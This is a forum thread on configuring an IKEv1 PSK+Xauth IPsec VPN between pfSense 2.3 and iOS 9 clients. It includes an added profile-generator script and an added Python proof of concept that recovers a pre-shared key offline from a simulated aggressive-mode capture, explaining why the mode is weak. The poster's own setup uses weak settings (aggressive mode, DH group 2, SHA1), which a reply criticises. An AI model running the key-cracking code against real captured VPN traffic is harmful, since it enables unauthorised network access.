IPSec Between iOS 9 and PFSense 2.3: Working Configuration
-
It took me much too long to get this to work, and I am seeing a lot of questions here about this configuration. So I figured I would share my configuration here after I finally got it to work.
My setup: PFSense is connected directly to a cable modem. I will use "192.0.2.1" as my external IP below. For my internal NAT'ed network, I will use 10.10.10.0/24
PFSense Setup:
IPSec Mobile Clients
- Enable IPsec Mobile Client Support
- User Authentication: Local Database
- Group Authentication: None
- Provide a virtual IP address to the clients: checked
- Network configuration for Virtual Address Pool: 10.10.10.150/29 (essentially an unused subnet of my internal NATed subnet)
- Provide a virtual IPv6 address to clients: not checked
- Provide a list of accessible networks to clients: checked
- Allow clients to save Xauth passwords: checked
- Provide default domain name to clients: not checked
- Provide a list of split DNS domain names to clients: not checked
- Provide a DNS server list to clients: checked
- list your DNS servers (10.10.10.1 for mine)
- provide a WINS server list to clients: not checked
- provide a phase2 PFS group to clients: not checked
- provide a login banner to clients: checked. I use "VPN Login Success"
IPSec Tunnel (aka "Phase 1")
- Disabled: unchecked
- Key Exchange version: V1
- Internet Protocol: IPv4
- Interface: 192.0.2.1 (or whatever your "WAN" is)
- Description: empty
- Authentication Method: Mutual PSK + Xauth
- Negotiation Mode: Aggressive
- My Identifier: IP Address
- Peer Identifier: Distinguished name "myvpnusers"
- Pre-shared key: <random preshared key>
- Encryption Algorithm: AES 256 bits
- Hash Algorithm: SHA1
- DH Group: 2 (1024 bit)
- Lifetime: 3600
- disable rekey: unchecked
- responder only: unchecked
- NAT Traversal: Auto
- Dead Peer Detection: checked
- Delay: 10
- Max failures: 5
Phase 2:
- Disabled: unchecked
- Mode: Tunnel IPv4
- Local Network: Network 0.0.0.0/0 (btw: I still only get traffic to 10.0.0.0/8 to the VPN…)
- NAT/BINAT: None
- Description: iOS
- Protocol: ESP
- Encryption Algorithms: AES 256 Bits (rest unchecked)
- Hash Algorithms: SHA1
- PFS key group: off
- Lifetime: 86400
For each user, configure a password, and add them to the VPN Users group.
The per-user IPsec Shared Secret is not used for PSK+Xauth authentication.
On iOS:
Server: 192.0.2.1
Account: username
Password: user's password
Group Name: myvpnusers (same string as above under Peer Identifier)
Secret: shared IPsec secret. Same for all users.
I hope this helps. I will post some screenshots later.
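The iOS settings above, packaged as a configuration profile instead of being typed in by hand, as an added example that is not part of the original post or of pfSense. It uses Python's standard plistlib; the key names are the ones Apple's Configuration Profile Reference documents for the VPN payload's IPSec dictionary, and the payload identifiers, profile name, account name and secret are constructed placeholders.

```python
"""Build an iOS .mobileconfig carrying the client settings from the post
(Server, Account, Group Name, Secret) so they need not be typed by hand.
Key names follow Apple's Configuration Profile Reference (VPN payload,
IPSec dictionary). Identifiers, names and the secret are constructed."""
import plistlib
import uuid


def ipsec_xauth_payload(name: str, server: str, group_name: str,
                        shared_secret: str, xauth_name: str) -> dict:
    """One com.apple.vpn.managed payload for IKEv1 PSK + Xauth (iOS "IPSec" type)."""
    return {
        "PayloadType": "com.apple.vpn.managed",
        "PayloadVersion": 1,
        "PayloadIdentifier": f"com.example.vpn.{name.lower()}",  # hypothetical
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": name,
        "UserDefinedName": name,                 # shown in Settings > VPN
        "VPNType": "IPSec",
        "IPSec": {
            "AuthenticationMethod": "SharedSecret",
            "RemoteAddress": server,             # "Server" in the post
            "LocalIdentifier": group_name,       # "Group Name" = pfSense Peer Identifier
            "LocalIdentifierType": "KeyID",
            # The PSK is a <data> element in the plist, so pass bytes, not str.
            "SharedSecret": shared_secret.encode(),
            "XAuthEnabled": 1,
            "XAuthName": xauth_name,             # "Account"; no XAuthPassword key,
                                                 # so iOS prompts instead of storing it
        },
        "IPv4": {"OverridePrimary": 1},          # route everything via the tunnel,
                                                 # matching phase 2 local 0.0.0.0/0
    }


def build_profile(payload: dict, display_name: str = "Home VPN") -> bytes:
    """Wrap a payload in a top-level Configuration profile and serialize it."""
    profile = {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.vpn.profile",  # hypothetical
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": display_name,
        "PayloadContent": [payload],
    }
    return plistlib.dumps(profile)


def load_profile(data: bytes) -> dict:
    """Parse a profile back, e.g. to check what a generated file contains."""
    return plistlib.loads(data)


if __name__ == "__main__":
    payload = ipsec_xauth_payload("HomeVPN", "192.0.2.1", "myvpnusers",
                                  "constructed-shared-secret", "alice")
    with open("home-vpn.mobileconfig", "wb") as fh:
        fh.write(build_profile(payload))
```

Mail the resulting file to the device or push it through MDM and install it; the Xauth password is deliberately not included, so the device asks for it on first connect.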
-
Thanks for sharing, but I wouldn't recommend your configuration because you use IKEv1 in aggressive mode for key exchange, which isn't a really safe method nowadays.
Why didn't you just setup according to:
https://doc.pfsense.org/index.php/IKEv2_with_EAP-MSCHAPv2
It's safer, working and quicker in establishing a connection.
Just send the certificate via email to your iPhone/iPad and you are good to go.
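The reason aggressive mode with a PSK is considered unsafe, worked through as an added example that is not code from the thread, pfSense or strongSwan. In IKEv1 aggressive mode the responder's HASH_R, its ID payload, both nonces, both cookies and both DH public values are sent unencrypted, and HASH_R is an HMAC whose key is derived only from the PSK and the two nonces (RFC 2409, section 5), so anyone who captures one exchange can test PSK guesses offline without sending another packet to the server. Every value below is a constructed stand-in for a capture, and the PSK is deliberately weak.

```python
"""Why IKEv1 aggressive mode + PSK is weak: HASH_R is a keyed hash whose key
derives only from the PSK, and all its other inputs travel in the clear, so a
passive observer can test PSK guesses offline (RFC 2409, section 5).
All values below are constructed stand-ins, not a real capture."""
import hashlib
import hmac
import ipaddress
from dataclasses import dataclass


def prf(key: bytes, data: bytes) -> bytes:
    # RFC 2409 prf = HMAC with the negotiated hash; the thread negotiates SHA1.
    return hmac.new(key, data, hashlib.sha1).digest()


def id_ipv4_body(addr: str) -> bytes:
    # ID payload body without the generic header (RFC 2407, 4.6.2):
    # ID type ID_IPV4_ADDR (1), protocol 0, port 0, then the address.
    return bytes([1, 0, 0, 0]) + ipaddress.IPv4Address(addr).packed


@dataclass(frozen=True)
class AggressiveCapture:
    """Everything a passive observer reads from aggressive-mode messages 1 and 2."""
    cky_i: bytes   # initiator cookie (ISAKMP header)
    cky_r: bytes   # responder cookie
    g_xi: bytes    # initiator DH public value (KE payload)
    g_xr: bytes    # responder DH public value
    ni: bytes      # initiator nonce
    nr: bytes      # responder nonce
    sai_b: bytes   # body of the initiator's SA payload
    idir_b: bytes  # body of the responder's ID payload
    hash_r: bytes  # responder's HASH_R, sent unencrypted in message 2


def skeyid(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    # Pre-shared-key authentication: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    return prf(psk, ni + nr)


def hash_r(psk: bytes, c: AggressiveCapture) -> bytes:
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    return prf(skeyid(psk, c.ni, c.nr),
               c.g_xr + c.g_xi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def constructed(label: bytes, n: int) -> bytes:
    # Deterministic filler standing in for the random protocol values.
    return hashlib.shake_128(label).digest(n)


def simulate_responder(psk: bytes, responder_ip: str = "192.0.2.1") -> AggressiveCapture:
    """What the responder (the pfSense box) emits for the given PSK.
    DH group 2 public values are 128 bytes; nonces and cookies use typical sizes."""
    fields = dict(
        cky_i=constructed(b"cky_i", 8), cky_r=constructed(b"cky_r", 8),
        g_xi=constructed(b"g_xi", 128), g_xr=constructed(b"g_xr", 128),
        ni=constructed(b"ni", 20), nr=constructed(b"nr", 20),
        sai_b=constructed(b"sai_b", 56),      # stand-in for the proposal bytes
        idir_b=id_ipv4_body(responder_ip),    # "My Identifier: IP Address"
    )
    partial = AggressiveCapture(hash_r=b"", **fields)
    return AggressiveCapture(hash_r=hash_r(psk, partial), **fields)


def crack_psk(c: AggressiveCapture, wordlist):
    """Offline dictionary attack: the captured HASH_R is the only oracle needed."""
    for guess in wordlist:
        if hmac.compare_digest(hash_r(guess.encode(), c), c.hash_r):
            return guess
    return None


if __name__ == "__main__":
    cap = simulate_responder(b"Summer2016")
    print(crack_psk(cap, ["password", "Summer2016", "myvpnusers"]))
```

In main mode the ID and HASH payloads are encrypted, so a passive observer cannot do this, and IKEv2 encrypts its AUTH exchange as well, so the linked IKEv2/EAP-MSCHAPv2 setup does not expose it either. With aggressive mode, the length and randomness of the PSK is all that stands between a captured exchange and the key.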
-
That's the next step. I was just happy to have this working for now.
-
BTW: I think a lot of the confusion on my side came from the fact that many of the guides (like the one you link to) are outdated not only on the PFSense side, but also on the iOS side. iOS seems to support AES256/SHA256/DH2048 just fine now.
-
Yes, but the type of encryption can easily be tested after configuration in general, and otherwise the article is up to date (and still working). But yes, the article could be updated with respect to encryption.